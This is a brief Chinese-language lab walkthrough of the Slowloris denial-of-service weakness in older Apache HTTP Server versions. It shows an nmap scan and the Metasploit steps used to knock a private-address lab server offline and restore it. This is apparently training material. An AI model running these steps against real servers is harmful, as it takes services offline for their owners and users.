一、漏洞简介
Apache HTTP服务器1.x和2.x允许远程攻击者通过部分HTTP请求导致拒绝服务(守护进程中断),这与2.2.15之前版本中缺少mod_ReqTimeout模块有关。
二、漏洞利用
1、访问我们的靶机:192.168.1.131,正常访问
2、启动msf,通过nmap扫描该服务器,判断该漏洞是否存在,nmap -sS -Pn -A 192.168.1.131
3、搜索可利用模块,并选择
search slowloris
4、查看需要配置的参数,只需配置目标ip即可show options
5、设置目标ip set 192.168.1.131
6、运行,run
7、再次访问靶机192.168.1.131,已无法访问
8、ctrl+c结束攻击,网页瞬间就又可以访问了
禁止非法,后果自负